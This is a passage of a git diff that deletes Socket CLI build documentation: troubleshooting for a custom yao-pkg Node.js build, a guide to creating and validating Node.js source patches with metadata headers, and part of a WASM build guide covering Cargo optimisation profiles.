Compiler error - Reinstall Xcode tools - -# Try clean build -node scripts/build-yao-pkg-node.mjs --clean -``` - -### Build Succeeds but Binary Doesn't Work - -**Symptoms**: -```bash -./out/Release/node --version -# No output or segfault -``` - -**Fix**: -```bash -# Verify build -node scripts/verify-node-build.mjs - -# If verification fails, rebuild -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Check if Socket modifications were applied correctly -grep -r "const isSea = () => true" .custom-node-build/node-yao-pkg/lib/sea.js -# Should return a match -``` - -### pkg Build Fails: "Binary not found" - -**Error**: -``` -Error: Binary not found in cache -``` - -**Fix**: -```bash -# Check if binary exists in cache -ls -lh ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64* - -# If missing, build was incomplete -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Verify it's in cache after build -ls -lh ~/.pkg-cache/v3.5/ -``` - -### pkg Build Fails: "SEA not detected" - -**Symptoms**: pkg binary runs but can't load embedded code - -**Fix**: -```bash -# Verify SEA modification was applied -node scripts/verify-node-build.mjs - -# Check the source file -cat .custom-node-build/node-yao-pkg/lib/sea.js | grep "isSea = () => true" - -# If not found, rebuild with clean flag -node scripts/build-yao-pkg-node.mjs --clean -``` - -## 📊 Build Time Estimates - -Based on CPU cores: - -| CPU Cores | Estimated Time | Range | -|-----------|----------------|-------| -| 2 cores | ~90 minutes | 75-110 min | -| 4 cores | ~75 minutes | 60-90 min | -| 8 cores | ~38 minutes | 30-46 min | -| 10 cores | ~30 minutes | 24-36 min | -| 12+ cores | ~25 minutes | 20-30 min | - -**Note**: First build is slower (downloads source). Subsequent builds are faster if source exists. 
- -## 🔐 Pre-flight Check Requirements - -Before building, ensure you have: - -- ✅ **Tools**: git, curl, patch, make, strip, codesign (macOS) -- ✅ **Disk Space**: At least 5GB free -- ✅ **Python**: Version 3.6 or later -- ✅ **Compiler**: clang++, g++, or c++ -- ✅ **Network**: Can reach GitHub and yao-pkg -- ✅ **Node.js Version**: Valid git tag exists - -**Check**: Script runs these checks automatically before building. - -## 📁 Important Directories - -``` -socket-cli/ -├── .custom-node-build/ # Build workspace -│ ├── node-yao-pkg/ # Node.js source (cloned) -│ ├── patches/ # Downloaded patches -│ │ └── node.v24.10.0.cpp.patch -│ ├── build.log # Build output log -│ └── .build-checkpoint # Progress checkpoint -│ -├── build/patches/socket/ # Socket-specific patches -│ ├── enable-sea-*.patch # SEA detection patches -│ └── fix-v8-*.patch # V8 include patches (v24.9.x only!) -│ -├── scripts/ -│ ├── build-yao-pkg-node.mjs # Main build script -│ ├── verify-node-build.mjs # Verification script -│ └── lib/ -│ ├── build-helpers.mjs # Helper functions -│ └── patch-validator.mjs # Patch validation -│ -└── docs/ - ├── node-patch-metadata.md # Patch format guide - └── technical/ - └── build-system-improvements.md -``` - -## 🎯 Build Flow Summary - -``` -1. Pre-flight Checks (30 seconds) - ✅ Tools, disk space, Python, compiler, network - -2. Download yao-pkg Patch (if needed) - ✅ Auto-retry up to 3 times - ✅ Integrity verification - -3. Validate yao-pkg Patch - ✅ Version compatibility - ✅ Content analysis - -4. Clone/Reset Node.js Source (2-5 minutes) - ✅ Git clone --depth 1 - -5. Validate Socket Patches - ✅ Metadata parsing - ✅ Version compatibility - ✅ Conflict detection - -6. Apply Patches - ✅ yao-pkg patches (V8 bytecode, PKG bootstrap) - ✅ Socket patches (SEA detection) - -7. Verify Modifications - ✅ Check SEA override applied - ✅ Check V8 includes correct - -8. Configure (2-5 minutes) - ✅ Optimization flags - -9. 
Build (30-90 minutes depending on CPU) - ✅ Make with parallel jobs - ✅ Log to build.log - -10. Smoke Test - ✅ --version check - ✅ Execute JavaScript - -11. Strip Debug Symbols (82MB → 54MB) - ✅ Smoke test after strip - -12. Code Sign (macOS ARM64 only) - ✅ Ad-hoc signing - -13. Install to Cache - ✅ Copy to ~/.pkg-cache/ - -14. Verify Build - ✅ 8-point verification (if --verify) - -15. Success! 🎉 -``` - -## 💡 Tips & Best Practices - -### 1. Always Use --clean for Major Changes - -```bash -# After updating Node.js version -# After modifying patches -# After build system changes -node scripts/build-yao-pkg-node.mjs --clean -``` - -### 2. Check Build Logs on Failure - -```bash -# Last 50 lines shown automatically -# Full log: -tail -f .custom-node-build/build.log # Monitor live -less .custom-node-build/build.log # Browse full log -grep -i error .custom-node-build/build.log # Find errors -``` - -### 3. Verify After Building - -```bash -# Quick verification -node scripts/verify-node-build.mjs - -# Full integration test -node scripts/test-yao-pkg-integration.mjs -``` - -### 4. Keep Cache Clean - -```bash -# Old builds accumulate, clean periodically: -rm -rf ~/.pkg-cache/v3.5/built-v24.9.* # Remove old versions -``` - -### 5. 
Use Existing Source When Possible - -```bash -# First build: Downloads source (slow) -node scripts/build-yao-pkg-node.mjs - -# Subsequent builds: Reuses source (faster) -node scripts/build-yao-pkg-node.mjs - -# Only use --clean when necessary -``` - -## 🔬 Advanced Debugging - -### Enable Debug Output - -```bash -# More verbose output (if implemented) -DEBUG=1 node scripts/build-yao-pkg-node.mjs -``` - -### Check Binary Dependencies - -```bash -# macOS: Check what libraries binary needs -otool -L ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 - -# Linux: Check library dependencies -ldd ~/.pkg-cache/v3.5/built-v24.10.0-linux-x64 -``` - -### Inspect Patch Metadata - -```bash -# See what a patch claims to support -head -20 build/patches/socket/enable-sea-*.patch - -# Should show: -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -``` - -### Test Binary in Isolation - -```bash -# Test the built binary directly -cd .custom-node-build/node-yao-pkg -./out/Release/node --version -./out/Release/node -e "console.log('Hello')" - -# Test SEA detection (should always be true) -./out/Release/node -e "console.log(require('node:sea').isSea())" -# Expected output: true -``` - -## 📚 Related Documentation - -- **[Build System Improvements](./technical/build-system-improvements.md)** - Complete technical overview -- **[Patch Metadata Format](./node-patch-metadata.md)** - How to write patches with metadata -- **[Build Improvements 2025-10-15](./technical/build-improvements-2025-10-15.md)** - Latest enhancements including test integration - -## 🆘 Getting Help - -### Check Documentation First - -1. This quick reference -2. Build system improvements doc -3. 
Patch metadata guide - -### Common Error Patterns - -- **"file not found"** → Check V8 patches (v24.10.0+ doesn't need them) -- **"tool not available"** → Install Xcode Command Line Tools -- **"version X doesn't exist"** → Check NODE_VERSION is valid git tag -- **"out of memory"** → Close applications, free up RAM -- **"disk full"** → Free up 5GB+ space - -### Still Stuck? - -1. Check build log: `.custom-node-build/build.log` -2. Try clean build: `node scripts/build-yao-pkg-node.mjs --clean` -3. Verify environment: Script runs pre-flight checks automatically -4. Check patch compatibility: Remove patches, let system use direct modifications - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-patch-creation-guide.md b/docs/build/node-patch-creation-guide.md deleted file mode 100644 index 8124e9ddf..000000000 --- a/docs/build/node-patch-creation-guide.md +++ /dev/null @@ -1,562 +0,0 @@ -# Node.js Patch Creation Guide - -Complete guide for creating, testing, and maintaining Node.js patches for the Socket CLI build system. - -## Overview - -This guide shows you how to: -1. Create new patches for Node.js modifications -2. Add proper metadata headers -3. Test patches before committing -4. Regenerate patches for new Node.js versions - -## When to Create Patches - -Create patches when: -- ✅ You need to modify Node.js source for a specific version -- ✅ The modifications are stable and repeatable -- ✅ You want to version-control the changes -- ✅ You need to share modifications with the team - -**Don't create patches** when: -- ❌ Modifications change frequently -- ❌ You're still experimenting -- ❌ Direct modifications are simpler - -## Quick Start - -```bash -# 1. Build Node.js with direct modifications -node scripts/build-yao-pkg-node.mjs --clean - -# 2. Generate patches from the modified source -node scripts/generate-node-patches.mjs --version=v24.10.0 - -# 3. 
Test the generated patches -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -## Step-by-Step: Creating a New Patch - -### Step 1: Start with Clean Source - -```bash -# Clean build directory -rm -rf .custom-node-build/node-yao-pkg/ - -# Clone fresh Node.js source -cd .custom-node-build -git clone --depth 1 --branch v24.10.0 https://github.com/nodejs/node.git node-yao-pkg -cd node-yao-pkg -``` - -### Step 2: Create a Git Branch - -```bash -# Create a branch for your changes -git checkout -b socket-modifications -``` - -### Step 3: Apply yao-pkg Patches First - -```bash -# Apply yao-pkg patches (infrastructure must be in place) -patch -p1 < ../.custom-node-build/patches/node.v24.10.0.cpp.patch -``` - -**Why?** Socket patches should be applied AFTER yao-pkg patches to avoid conflicts. - -### Step 4: Make Your Modifications - -Edit the files you need to modify. For example, to enable SEA detection: - -```bash -# Edit lib/sea.js -nano lib/sea.js -``` - -Make your changes: -```javascript -// Before: -const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - -// After: -const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -``` - -### Step 5: Commit Your Changes - -```bash -# Stage the changes -git add lib/sea.js - -# Commit with descriptive message -git commit -m "Enable SEA detection for pkg binaries" -``` - -### Step 6: Generate the Patch - -```bash -# Generate patch from the commit -git format-patch -1 HEAD - -# This creates: 0001-Enable-SEA-detection-for-pkg-binaries.patch -``` - -### Step 7: Add Metadata - -Open the generated patch and add metadata at the top: - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# -# Overrides the isSea binding to always return true, making pkg binaries -# report as Single Executable Applications for consistency. 
-# -# This is required for pkg to properly detect and load embedded code. - -From abc123def456... Mon Sep 17 00:00:00 2001 -From: Your Name -Date: Mon, 15 Oct 2025 12:00:00 -0700 -Subject: [PATCH] Enable SEA detection for pkg binaries - ---- - lib/sea.js | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/lib/sea.js b/lib/sea.js -index 1234567..8901234 100644 ---- a/lib/sea.js -+++ b/lib/sea.js -@@ -3,7 +3,8 @@ const { - ArrayBufferPrototypeSlice, - } = primordials; - --const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - const { TextDecoder } = require('internal/encoding'); - const { validateString } = require('internal/validators'); - const { --- -2.39.0 -``` - -### Step 8: Name and Move the Patch - -```bash -# Rename with descriptive name -mv 0001-Enable-SEA-detection-for-pkg-binaries.patch \ - enable-sea-for-pkg-binaries-v24-10-0.patch - -# Move to Socket patches directory -mv enable-sea-for-pkg-binaries-v24-10-0.patch \ - ../../build/patches/socket/ -``` - -### Step 9: Test the Patch - -```bash -# Clean and rebuild using the patch -cd ../.. -node scripts/build-yao-pkg-node.mjs --clean -``` - -**Expected output**: -``` -Validating Socket Patches -Found 1 patch(es) for v24.10.0 -Checking integrity, compatibility, and conflicts... - -Validating enable-sea-for-pkg-binaries-v24-10-0.patch... - 📝 Enable SEA detection for pkg binaries - ✓ Modifies SEA detection - ✅ Valid - -✅ All Socket patches validated successfully -✅ No conflicts detected - -Testing Socket Patch Application -Running dry-run to ensure patches will apply cleanly... - -Testing enable-sea-for-pkg-binaries-v24-10-0.patch... - ✅ Will apply cleanly - -Applying Socket Patches -Applying enable-sea-for-pkg-binaries-v24-10-0.patch... 
-✅ enable-sea-for-pkg-binaries-v24-10-0.patch applied -``` - -### Step 10: Verify the Build - -```bash -# Verify the modifications were applied correctly -node scripts/verify-node-build.mjs -``` - -### Step 11: Commit the Patch - -```bash -# Add the patch to version control -git add build/patches/socket/enable-sea-for-pkg-binaries-v24-10-0.patch -git commit -m "Add SEA detection patch for Node.js v24.10.0" -``` - -## Patch Naming Conventions - -### Format - -``` ---.patch -``` - -### Examples - -```bash -# Good names: -enable-sea-for-pkg-binaries-v24-10-0.patch -fix-v8-include-paths-v24-9-0.patch -remove-deprecated-api-v24-10-0.patch - -# Bad names: -patch1.patch -my-fix.patch -node-modifications.patch -``` - -### Version Patterns - -```bash -# Specific version -enable-sea-v24-10-0.patch # Only v24.10.0 - -# Version range (generic) -enable-sea-v24.patch # All v24.x.x -``` - -**Best practice**: Use specific version numbers for clarity. - -## Metadata Reference - -### Required Fields - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -``` - -### Optional Fields - -```patch -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-patch -``` - -### Example: Complete Metadata - -```patch -# @node-versions: v24.10.0, v24.10.1, v24.10.2 -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-implementation -# -# Long-form description: -# This patch modifies lib/sea.js to always return true for isSea() -# enabling pkg binaries to use Node.js SEA APIs correctly. -# -# The modification is required because pkg needs to detect when -# running as a single executable application. 
-``` - -## Testing Patches - -### Manual Testing - -```bash -# Test patch application (dry-run) -cd .custom-node-build/node-yao-pkg -patch -p1 --dry-run < ../../build/patches/socket/your-patch.patch - -# If successful, apply it -patch -p1 < ../../build/patches/socket/your-patch.patch -``` - -### Automated Testing - -```bash -# Run full build with verification -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Run integration test -node scripts/test-yao-pkg-integration.mjs -``` - -### Validation Testing - -```bash -# Test patch validator -node -e " -import { validatePatch } from './scripts/lib/patch-validator.mjs'; -const result = await validatePatch( - 'build/patches/socket/your-patch.patch', - 'v24.10.0' -); -console.log(result); -" -``` - -## Regenerating Patches for New Versions - -When a new Node.js version is released: - -### Option 1: Automatic Regeneration - -```bash -# Try applying existing patches to new version -node scripts/build-yao-pkg-node.mjs --version=v24.11.0 --clean - -# If it fails, regenerate: -node scripts/regenerate-node-patches.mjs --version=v24.11.0 -``` - -### Option 2: Manual Regeneration - -```bash -# 1. Clone new Node.js version -cd .custom-node-build -rm -rf node-yao-pkg -git clone --depth 1 --branch v24.11.0 https://github.com/nodejs/node.git node-yao-pkg -cd node-yao-pkg - -# 2. Apply yao-pkg patches -patch -p1 < ../patches/node.v24.11.0.cpp.patch - -# 3. Make your modifications again -# (Edit files as needed) - -# 4. Generate new patches -git add . -git commit -m "Socket modifications for v24.11.0" -git format-patch -1 HEAD - -# 5. Add metadata and move to patches directory -mv 0001-*.patch ../../build/patches/socket/enable-sea-v24-11-0.patch -``` - -## Common Scenarios - -### Scenario 1: Modify Single File - -**Goal**: Change one JavaScript file - -**Steps**: -1. Edit the file -2. `git add ` -3. `git commit -m "Description"` -4. `git format-patch -1 HEAD` -5. Add metadata -6. 
Move to patches directory - -### Scenario 2: Modify Multiple Files - -**Goal**: Change several files in one patch - -**Steps**: -1. Edit all files -2. `git add ` -3. `git commit -m "Description"` -4. `git format-patch -1 HEAD` -5. Add metadata -6. Move to patches directory - -### Scenario 3: Multiple Independent Changes - -**Goal**: Create separate patches for different concerns - -**Steps**: -1. Edit first set of files -2. `git add ` -3. `git commit -m "First change"` -4. Edit second set of files -5. `git add ` -6. `git commit -m "Second change"` -7. `git format-patch -2 HEAD` (creates 2 patches) -8. Add metadata to both -9. Move both to patches directory - -### Scenario 4: Update Existing Patch - -**Goal**: Fix an existing patch - -**Steps**: -1. Start fresh: `rm -rf .custom-node-build/node-yao-pkg` -2. Clone and apply yao-pkg patches -3. Make the CORRECTED modifications -4. Generate new patch -5. Replace old patch file - -## Troubleshooting - -### Patch Won't Apply - -**Symptoms**: -``` -File to patch: -``` - -**Causes**: -- Wrong strip level (`-p0` vs `-p1`) -- Context doesn't match Node.js version -- File structure changed - -**Fix**: -```bash -# Try different strip level -patch -p0 < patch.patch # For paths without a/ b/ -patch -p1 < patch.patch # For Git-format paths - -# Check patch context -head -50 patch.patch # See what line numbers it expects - -# Regenerate for correct version -``` - -### Validation Fails - -**Symptoms**: -``` -❌ INVALID: Patch supports v24.9.0 but you're using v24.10.0 -``` - -**Fix**: -```patch -# Update @node-versions in patch header -# @node-versions: v24.9.0, v24.10.0 -``` - -### Conflicts with Other Patches - -**Symptoms**: -``` -⚠️ WARNING: Multiple patches modify lib/sea.js -``` - -**Fix**: -- Combine patches into one -- Or mark as conflicting: -```patch -# @conflicts: other-patch-name -``` - -### Dry-Run Fails - -**Symptoms**: -``` -❌ Cannot apply: Patch dry-run failed with exit code 1 -``` - -**Fix**: -```bash -# Check patch 
manually -cd .custom-node-build/node-yao-pkg -patch -p1 --dry-run < ../../build/patches/socket/your-patch.patch - -# See specific errors -# Regenerate if needed -``` - -## Best Practices - -### DO - -- ✅ **Test thoroughly** - Always test patches with `--clean` build -- ✅ **Add clear metadata** - Version requirements, description, dependencies -- ✅ **Use descriptive names** - `enable-sea-v24-10-0.patch`, not `patch1.patch` -- ✅ **Keep patches focused** - One concern per patch when possible -- ✅ **Document why** - Explain the purpose in metadata -- ✅ **Version patches** - Include Node.js version in filename - -### DON'T - -- ❌ **Don't skip metadata** - Always include `@node-versions` and `@description` -- ❌ **Don't guess versions** - Test patches on actual Node.js versions -- ❌ **Don't mix concerns** - Don't combine unrelated changes in one patch -- ❌ **Don't use wildcards loosely** - `v24+` might break on v25.0.0 -- ❌ **Don't forget to test** - Always verify patches apply and build succeeds - -## Automation Scripts - -### Generate Patches Script - -Create `scripts/generate-node-patches.mjs`: - -```javascript -#!/usr/bin/env node - -import { join } from 'node:path' -import { spawn } from '@socketsecurity/registry/lib/spawn' - -const NODE_VERSION = process.argv[2] || 'v24.10.0' -const SOURCE_DIR = join(process.cwd(), '.custom-node-build', 'node-yao-pkg') -const PATCHES_DIR = join(process.cwd(), 'build', 'patches', 'socket') - -console.log(`Generating patches for ${NODE_VERSION}...`) - -// Generate patches from git commits -const result = await spawn('git', ['format-patch', '-o', PATCHES_DIR, 'HEAD~1..HEAD'], { - cwd: SOURCE_DIR, - stdio: 'pipe', -}) - -if (result.code !== 0) { - console.error('Failed to generate patches') - process.exit(1) -} - -console.log(`✅ Patches generated in ${PATCHES_DIR}`) -console.log('📝 Don't forget to add metadata headers!') -``` - -## Quick Reference - -```bash -# Create branch -git checkout -b modifications - -# Apply yao-pkg patches 
-patch -p1 < yao-patch.patch - -# Make changes -edit files... - -# Commit -git add . -git commit -m "Description" - -# Generate patch -git format-patch -1 HEAD - -# Add metadata (edit file) -nano 0001-*.patch - -# Rename and move -mv 0001-*.patch enable-sea-v24-10-0.patch -mv enable-sea-v24-10-0.patch ../../build/patches/socket/ - -# Test -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -## Related Documentation - -- **[Patch Metadata Format](./node-patch-metadata.md)** - Metadata specification -- **[Build System](./technical/build-system-improvements.md)** - Build system overview -- **[Quick Reference](./node-build-quick-reference.md)** - Troubleshooting guide - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-patch-metadata.md b/docs/build/node-patch-metadata.md deleted file mode 100644 index f6ec55c83..000000000 --- a/docs/build/node-patch-metadata.md +++ /dev/null @@ -1,342 +0,0 @@ -# Node.js Patch Metadata Format - -This document describes the metadata format used in Node.js patches for the Socket CLI build system. - -## Overview - -Patches can include metadata in header comments to help the build system validate compatibility, detect conflicts, and provide better error messages. - -## Metadata Format - -Metadata is specified in comments at the **beginning of the patch file** using special directives: - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-patch -# -# This patch modifies lib/sea.js to always return true for isSea() -# enabling pkg binaries to use Node.js SEA APIs. -# -diff --git a/lib/sea.js b/lib/sea.js -... -``` - -## Metadata Directives - -### `@node-versions` - -**Purpose**: Specify which Node.js versions the patch is compatible with. - -**Format**: Comma-separated list of version specifiers. 
- -**Version Specifiers**: -- **Exact version**: `v24.10.0` - Only this version -- **Version range**: `v24.9.0-v24.9.5` - Inclusive range -- **Version and above**: `v24.10.0+` - This version and all later versions - -**Examples**: -```patch -# Single version -# @node-versions: v24.10.0 - -# Multiple specific versions -# @node-versions: v24.10.0, v24.10.1, v24.10.2 - -# Version range -# @node-versions: v24.9.0-v24.9.5 - -# Version and above -# @node-versions: v24.10.0+ - -# Complex specification -# @node-versions: v24.9.0-v24.9.5, v24.10.0+ -``` - -**Validation**: -- If `@node-versions` is present, the patch will only be applied to matching Node.js versions -- If omitted, the patch is assumed compatible with all versions (use with caution!) - -### `@description` - -**Purpose**: Brief description of what the patch does. - -**Format**: Single-line text description. - -**Examples**: -```patch -# @description: Enable SEA detection for pkg binaries -# @description: Fix V8 include paths for v24.9.0 build -# @description: Remove deprecated API usage -``` - -**Usage**: -- Displayed during patch validation -- Helps users understand what the patch does -- Keep it concise (one line) - -### `@requires` - -**Purpose**: List other patches or conditions that must be satisfied. - -**Format**: Comma-separated list of dependency names. - -**Examples**: -```patch -# Single dependency -# @requires: yao-pkg-patches - -# Multiple dependencies -# @requires: yao-pkg-patches, socket-base-modifications -``` - -**Validation**: -- Build system warns if required patches are missing -- Helps ensure patches are applied in correct order - -### `@conflicts` - -**Purpose**: List patches that conflict with this one. - -**Format**: Comma-separated list of conflicting patch names. 
- -**Examples**: -```patch -# Single conflict -# @conflicts: alternative-sea-implementation - -# Multiple conflicts -# @conflicts: old-v8-fix, deprecated-sea-patch -``` - -**Validation**: -- Build system errors if conflicting patches are present -- Prevents incompatible patches from being applied together - -## Complete Examples - -### Example 1: SEA Detection Patch - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# -# This patch modifies lib/sea.js to always return true for isSea() -# which enables pkg binaries to use Node.js Single Executable Application APIs. -# -# The yao-pkg fork requires this modification to properly detect and handle -# embedded JavaScript code in single-file executables. -# -diff --git a/lib/sea.js b/lib/sea.js -index 1234567..8901234 100644 ---- lib/sea.js -+++ lib/sea.js -@@ -1,7 +1,8 @@ - 'use strict'; - const { - ArrayBufferPrototypeSlice, - } = primordials; - --const { isSea, getAsset: getAssetInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal } = internalBinding('sea'); -``` - -### Example 2: V8 Include Path Fix (Version-Specific) - -```patch -# @node-versions: v24.9.0-v24.9.5 -# @description: Fix V8 include paths for v24.9.0 build -# @conflicts: v24.10.0-patches -# -# Node.js v24.9.x has incorrect V8 include paths that cause build failures. -# This patch removes the "src/" prefix from V8 internal includes. -# -# IMPORTANT: Do NOT use this patch with v24.10.0+ - those versions have -# correct include paths already! 
-# -diff --git a/deps/v8/src/heap/cppgc/heap-page.h b/deps/v8/src/heap/cppgc/heap-page.h -index 1234567..8901234 100644 ---- deps/v8/src/heap/cppgc/heap-page.h -+++ deps/v8/src/heap/cppgc/heap-page.h -@@ -9,7 +9,7 @@ - #include - #include - --#include "src/base/iterator.h" -+#include "base/iterator.h" -``` - -### Example 3: Combined Modifications - -```patch -# @node-versions: v24.10.0+ -# @description: Socket CLI Node.js modifications for pkg support -# @requires: yao-pkg-patches -# -# Combined patch that applies all Socket CLI modifications: -# 1. Enable SEA detection (lib/sea.js) -# 2. Remove deprecated APIs -# 3. Configure for minimal binary size -# -diff --git a/lib/sea.js b/lib/sea.js -... -diff --git a/lib/internal/bootstrap/node.js b/lib/internal/bootstrap/node.js -... -``` - -## Best Practices - -### 1. Always Specify Version Compatibility - -```patch -# ✅ GOOD: Explicit version specification -# @node-versions: v24.10.0+ - -# ❌ BAD: No version specification (assumes all versions work) -``` - -### 2. Use Descriptive Names - -```patch -# ✅ GOOD: Clear description -# @description: Enable SEA detection for pkg binaries - -# ❌ BAD: Vague description -# @description: Fix stuff -``` - -### 3. Document Conflicts - -```patch -# ✅ GOOD: Explicitly mark conflicts -# @node-versions: v24.9.0-v24.9.5 -# @conflicts: v24.10.0-patches -# @description: Fix V8 includes (v24.9.x only) - -# ❌ BAD: No conflict information -# Could be applied with v24.10.0 patches, causing build failure -``` - -### 4. Include Context in Comments - -```patch -# ✅ GOOD: Explain why the patch is needed -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# -# This patch is required because pkg needs to detect when running -# as a single executable application. The yao-pkg fork expects -# isSea() to return true in all pkg-built binaries. -# -# Without this patch, pkg binaries will fail to load embedded code. 
- -# ❌ BAD: No context -# @node-versions: v24.10.0+ -# @description: Change isSea -``` - -### 5. Test Version Ranges Carefully - -```patch -# ✅ GOOD: Tested on specific versions -# @node-versions: v24.10.0, v24.10.1 -# @description: Enable SEA detection - -# ⚠️ CAUTION: Broad version range (test thoroughly!) -# @node-versions: v24.10.0+ -# @description: Enable SEA detection -``` - -## Validation Flow - -When you run the build script, patch validation happens in this order: - -1. **File Integrity Check** - - Verify patch file is not empty - - Verify patch file is not an HTML error page - - Verify patch contains diff markers - -2. **Metadata Parsing** - - Extract `@node-versions`, `@description`, `@requires`, `@conflicts` - - Parse version specifiers - -3. **Version Compatibility Check** - - Compare Node.js version against `@node-versions` - - Reject patch if version doesn't match - -4. **Content Analysis** - - Detect what files the patch modifies - - Detect V8 include modifications - - Detect SEA modifications - -5. **Conflict Detection** - - Check if multiple patches modify same files - - Check if patches have conflicting `@conflicts` declarations - - Check if patches are compatible with Node.js version - -6. **Application** - - Apply patches in order if all validation passes - - Fall back to direct modifications if patches fail - -## Error Messages - -### Version Incompatibility - -``` -❌ INVALID: Patch supports v24.9.0-v24.9.5 but you're using v24.10.0 -``` - -**Fix**: Use a patch compatible with your Node.js version. - -### Corrupted Patch - -``` -❌ INVALID: Patch file contains HTML (probably download error) -``` - -**Fix**: Re-download the patch file. - -### Patch Conflicts - -``` -❌ ERROR: Patches modify V8 includes but v24.10.0 doesn't need this fix -``` - -**Fix**: Remove incompatible V8 patches for v24.10.0+. 
- -## Advanced: Programmatic Validation - -You can validate patches programmatically using the patch validator: - -```javascript -import { validatePatch, analyzePatchContent } from './scripts/lib/patch-validator.mjs' - -// Validate a patch -const validation = await validatePatch('path/to/patch.patch', 'v24.10.0') -if (!validation.valid) { - console.error(`Invalid: ${validation.reason}`) -} else { - console.log(`Valid: ${validation.metadata.description}`) -} - -// Analyze patch content -const content = await readFile('patch.patch', 'utf8') -const analysis = analyzePatchContent(content) -console.log(`Modifies ${analysis.modifiesFiles.length} files`) -console.log(`V8 includes: ${analysis.modifiesV8Includes}`) -console.log(`SEA detection: ${analysis.modifiesSEA}`) -``` - -## Related Documentation - -- [Build System Improvements](./technical/build-system-improvements.md) - Complete build system documentation -- [Patch Implementation Plan](./socket-patch-implementation-plan.md) - Original patch system design -- [Node.js Patch Progress](./socket-patch-progress.md) - Patch development history - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/wasm-build-guide.md b/docs/build/wasm-build-guide.md deleted file mode 100644 index b203bcfc5..000000000 --- a/docs/build/wasm-build-guide.md +++ /dev/null @@ -1,352 +0,0 @@ -# WASM Build Guide - -Quick reference for building and optimizing Socket CLI's WASM bundle. 
- ---- - -## Quick Start - -### Production Build - -```bash -# Full optimized build (~5-10 minutes) -node scripts/wasm/build-unified-wasm.mjs - -# Or via CLI wrapper -node scripts/wasm.mjs --build -``` - -### Fast Dev Build (3-5x Faster) - -```bash -# Minimal optimization, fast iteration (~2-5 minutes) -node scripts/wasm/build-unified-wasm.mjs --dev - -# Or via CLI wrapper -node scripts/wasm.mjs --build --dev -``` - ---- - -## Build Modes Comparison - -| Mode | Build Time | Size | Use Case | -|------|------------|------|----------| -| **Dev** | 2-5 min | ~108-110 MB | Rapid iteration, testing | -| **Production** | 5-10 min | ~108-110 MB | Release, deployment | - -Both modes produce similar final sizes due to symbol stripping, but production has better runtime performance. - ---- - -## Optimization Levels - -### Dev Build (`--dev`) - -**Cargo Profile**: `dev-wasm` - -```toml -opt-level = 1 # Minimal optimization -lto = false # No link-time optimization -codegen-units = 16 # Parallel compilation (faster) -strip = true # Strip symbols (smaller) -``` - -**RUSTFLAGS**: -```bash --C target-feature=+simd128 # Enable WASM SIMD -``` - -### Production Build (default) - -**Cargo Profile**: `release` - -```toml -opt-level = "z" # Maximum size optimization -lto = "thin" # Thin link-time optimization -codegen-units = 1 # Single unit (best optimization) -strip = true # Strip symbols -panic = "abort" # No unwinding code -``` - -**RUSTFLAGS**: -```bash --C target-feature=+simd128 # Enable WASM SIMD --C link-arg=--strip-debug # Strip debug info --C link-arg=--strip-all # Strip all symbols -``` - ---- - -## Performance Optimizations - -### 1. Build Caching (Optional but Recommended) - -Install sccache for 40-60% faster clean builds: - -```bash -# Install -cargo install sccache - -# Configure environment -export RUSTC_WRAPPER=sccache -export SCCACHE_DIR=$HOME/.cache/sccache - -# Check cache stats -sccache --show-stats -``` - -### 2. 
Auto-Setup Environment - -```bash -# Interactive setup -node scripts/wasm/setup-build-env.mjs - -# Apply to shell -eval "$(node scripts/wasm/setup-build-env.mjs --export)" - -# Or append to shell config -node scripts/wasm/setup-build-env.mjs --export >> ~/.zshrc -source ~/.zshrc -``` - -### 3. Parallel Builds - -Ensure cargo uses all CPU cores: - -```bash -export CARGO_BUILD_JOBS=$(nproc) # Linux -export CARGO_BUILD_JOBS=$(sysctl -n hw.ncpu) # macOS -``` - ---- - -## Benchmarking - -Compare dev vs production build times: - -```bash -# Benchmark both modes -node scripts/wasm/benchmark-build.mjs - -# Benchmark dev only -node scripts/wasm/benchmark-build.mjs --dev-only - -# Benchmark production only -node scripts/wasm/benchmark-build.mjs --prod-only -``` - -**Expected Output**: -``` -Build Time Comparison: - Dev Build: 2m 30s - Prod Build: 8m 15s - Speedup: 3.3x faster (dev vs prod) -``` - ---- - -## Build Pipeline - -The build process consists of these steps: - -1. **Check Rust toolchain** - Install if missing -2. **Download models** - CodeT5, MiniLM, ONNX Runtime, Yoga -3. **Convert models** - INT4 quantization for CodeT5 -4. **Build WASM** - Rust → WASM compilation -5. **Optimize WASM** - wasm-opt -Oz (5-15% reduction) -6. **Compress** - Brotli quality 11 (~70% reduction) -7. **Embed** - Base64 encode into JavaScript - ---- - -## Size Breakdown - -### Before Compression - -| Component | Size | -|-----------|------| -| MiniLM model (INT8) | ~17 